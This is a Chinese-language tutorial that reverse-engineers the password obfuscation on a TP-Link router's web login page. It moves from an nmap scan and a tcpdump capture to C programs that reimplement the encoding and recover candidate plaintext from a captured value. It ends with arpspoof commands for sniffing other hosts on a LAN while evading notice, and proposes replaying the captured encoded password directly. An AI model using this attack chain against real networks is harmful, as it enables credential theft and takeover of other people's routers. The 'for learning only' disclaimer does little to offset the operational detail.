探尋TP-Link路由器的登陸驗證

提示:該案例僅供學習使用，切勿濫用！！！

查找路由器鏈接地址

查找ip

$ ifconfig 
enp2s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.100.100  netmask 255.255.255.0  broadcast 192.168.100.255
        inet6 fe80::d4ed:7daa:b8d3:c4c8  prefixlen 64  scopeid 0x20<link>
        ether 88:d7:f6:d7:69:ff  txqueuelen 1000  (Ethernet)
        RX packets 266  bytes 28134 (27.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 437  bytes 50434 (49.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2532  bytes 146228 (142.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2532  bytes 146228 (142.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlp3s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.101  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::715:76a8:1fe8:cd16  prefixlen 64  scopeid 0x20<link>
        ether f0:03:8c:cd:38:df  txqueuelen 1000  (Ethernet)
        RX packets 11665  bytes 6505516 (6.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12599  bytes 1817081 (1.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

能夠發現，無線是鏈接的192.168.0.101,用nmap掃描一下地址段

 

$ nmap 192.168.0.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-06 10:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.0036s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp

Nmap scan report for 192.168.0.101
Host is up (0.000064s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for 192.168.0.102
Host is up (0.034s latency).
All 1000 scanned ports on 192.168.0.102 are closed

Nmap scan report for 192.168.0.107
Host is up (0.018s latency).
All 1000 scanned ports on 192.168.0.107 are closed

Nmap done: 256 IP addresses (4 hosts up) scanned in 23.75 seconds

經過上述發現，有開啓Http 服務的地址僅僅只有192.168.0.1，測試後發現，果真是這個地址

 

嘗試輸入密碼，進行抓包，查看是否能夠直接獲取到

密碼輸入123456

經過抓包發現，密碼是被加密的，例如:

{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}

整段tcpdump

$ sudo tcpdump dst -i wlp3s0 host 192.168.0.1 -A -s 0 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on wlp3s0, link-type EN10MB (Ethernet), capture size 262144 bytes
10:41:30.386855 ARP, Reply 192.168.0.101 is-at f0:03:8c:cd:38:df (oui Unknown), length 28
............8....e...(......
10:41:35.392411 IP 192.168.0.101.49544 > 192.168.0.1.domain: 37050+ PTR? 101.0.168.192.in-addr.arpa. (44)
E..HtV@.@.D....e.......5.4l..............101.0.168.192.in-addr.arpa.....
10:41:43.401175 IP 192.168.0.101.39825 > 192.168.0.1.domain: 37050+ PTR? 101.0.168.192.in-addr.arpa. (44)
E..Hv.@.@.B_...e.......5.4...............101.0.168.192.in-addr.arpa.....
10:41:51.409822 IP 192.168.0.101.33674 > 192.168.0.1.domain: 7850+ PTR? 1.0.168.192.in-addr.arpa. (42)
E..F{N@.@.=....e.......5.2N..............1.0.168.192.in-addr.arpa.....
10:41:54.510728 IP 192.168.0.101.57460 > 192.168.0.1.http: Flags [S], seq 2142999657, win 29200, options [mss 1460,sackOK,TS val 4211907350 ecr 0,nop,wscale 7], length 0
E..<..@.@..2...e.....t.P...i......r..+.........
............
10:41:54.510781 IP 192.168.0.101.57462 > 192.168.0.1.http: Flags [S], seq 4248366888, win 29200, options [mss 1460,sackOK,TS val 4211907350 ecr 0,nop,wscale 7], length 0
E..<|.@.@.<s...e.....v.P.8.(......r............
............
10:41:54.513031 IP 192.168.0.101.57460 > 192.168.0.1.http: Flags [.], ack 2934210160, win 229, options [nop,nop,TS val 4211907352 ecr 83817372], length 0
E..4..@.@..9...e.....t.P...j..~p....C!.....
........
10:41:54.513053 IP 192.168.0.101.57462 > 192.168.0.1.http: Flags [.], ack 3628871599, win 229, options [nop,nop,TS val 4211907352 ecr 83817372], length 0
E..4|.@.@.<z...e.....v.P.8.).L/......;.....
........
10:42:03.722970 IP 192.168.0.101.57504 > 192.168.0.1.http: Flags [S], seq 2247285204, win 29200, options [mss 1460,sackOK,TS val 4211916562 ecr 0,nop,wscale 7], length 0
E..<Em@.@.s....e.......P..........r.Ya.........
............
10:42:03.724543 IP 192.168.0.101.57504 > 192.168.0.1.http: Flags [.], ack 4178226170, win 229, options [nop,nop,TS val 4211916564 ecr 83817925], length 0
E..4En@.@.s....e.......P.....
......Y}.....
........
10:42:03.724789 IP 192.168.0.101.57504 > 192.168.0.1.http: Flags [P.], seq 0:514, ack 1, win 229, options [nop,nop,TS val 4211916564 ecr 83817925], length 514: HTTP: POST / HTTP/1.1
E..6Eo@.@.q....e.......P.....
.............
........POST / HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://192.168.0.1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}
10:42:03.742580 IP 192.168.0.101.57504 > 192.168.0.1.http: Flags [.], ack 165, win 237, options [nop,nop,TS val 4211916582 ecr 83817926], length 0

查找路由器的加密算法 

經過搜索，本身探測，發現加密算法在class.js中:

其加密語句爲:
其中，密碼爲a

this.orgAuthPwd = function(a) {
    return this.securityEncode(a, "RDpbLfCPsJZ7fiv", "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW")
};
this.securityEncode = function(a, c, b) {
    var d = "",
    e, f, g, h, k = 187,
    m = 187;
    f = a.length;
    g = c.length;
    h = b.length;
    e = f > g ? f: g;
    for (var l = 0; l < e; l++) m = k = 187,
    l >= f ? m = c.charCodeAt(l) : l >= g ? k = a.charCodeAt(l) : (k = a.charCodeAt(l), m = c.charCodeAt(l)),
    d += b.charAt((k ^ m) % h);
    return d
};

將上述javascript改成用C語言實現加密以及解密

加密

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main() {

    int L_PassWd  , L_Secret_Ket , L_Encrypted_string;
    
    // 待加密的字符串
    char PassWd[] = "123456";

    // 本身理解爲祕鑰和加密串
    char Secret_key[] = "RDpbLfCPsJZ7fiv";
    char Encrypted_string[] = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW";

    int k = 187 , m = 187;


    L_PassWd = strlen(PassWd);
    L_Secret_Ket = strlen(Secret_key);
    L_Encrypted_string = strlen(Encrypted_string);

    int e;
    e = L_PassWd  > L_Secret_Ket ? L_PassWd  : L_Secret_Ket;

    int l;

    for (l=0;l<e;l++) {
        m = k = 187;

        if ( l >= L_PassWd ) {
            m = Secret_key[l];
        } else {
            if ( l >= L_Secret_Ket ) {
                k = PassWd[l];
            } else {
                k = PassWd [l];
                m = Secret_key[l];
            }
            
        }

        printf("%c" , (Encrypted_string[k ^ m] % L_Encrypted_string));

    }

    printf("\n");

    return 0;
}

執行效果

$ gcc SecurityEncode.c 
$ ./a.out 
0KcgeXhc9TefbwK
$ 

解密(僅僅寫了用戶密碼長度不大於祕鑰長度的)，代碼未優化

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main() {
    // 加密後的字符串
    char Encryption_String[] = "0KcgeXhc9TefbwK";

    // 本身理解爲祕鑰和加密串
    char Secret_key[] = "RDpbLfCPsJZ7fiv";
    char Encrypted_string[] = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW";
    char a1;

    // 若是用戶輸入的登陸密碼長度小於等於祕鑰長度，則按照祕鑰來解析
    if (strlen(Encryption_String) == strlen(Secret_key)) {
        printf ("是根據祕鑰來生成的加密後的密碼\n");

        int l , j ;
        int isok = 0;
        for (l=0;l<strlen(Secret_key);l++) {

            isok = 0;
            for (j=0;j<strlen(Encrypted_string);j++) {
                
                if (Encrypted_string[j] == Encryption_String[l]) {

                    if ((j ^ Secret_key[l]) > 33 && (j ^ Secret_key[l]) < 126) {
                        printf ("%c " , j ^ Secret_key[l]);
                        isok = 1;
                    }
                }
            }
            if (isok == 0 ) {
                break;
            }
            printf ("\n第%d個值的密碼計算完畢\n" , l+1);
            printf("\n");
        }

    // 若是用戶輸入的登陸密碼長度小於等於祕鑰長度，則按照用戶來解析
    } else {
        printf ("是根據用戶本身的密碼來生成的,改天再來");
    
    }

    return 0;
}

執行效果

$ gcc DecryptCode.c
$ ./a.out 
是根據祕鑰來生成的加密後的密碼
W J 1 ; ( 
第1個值的密碼計算完畢

C J 2 
第2個值的密碼計算完畢

3 9 
第3個值的密碼計算完畢

o 7 4 
第4個值的密碼計算完畢

5 
第5個值的密碼計算完畢

- 6 
第6個值的密碼計算完畢

$ 

總結

默認狀況下，tcpdump只能抓本身主機的數據包，要想實如今局域網內對其餘機器進行抓包，則須要使用arp欺騙(不要被對方察覺了，否則乾死你咋辦)，使用方法:

開啓轉發
$ sudo sysctl net.ipv4.ip_forward=1
$ sudo sysctl -p
截獲數據包
$ arpspoof -i eth1 -t host gw
$ arpspoof -i eth1 -t gw host

換個角度想，假設咱們已經有這個密碼密文了，還須要將密文解析成明文麼，我以爲沒有必要，直接模擬http do請求就能夠了吧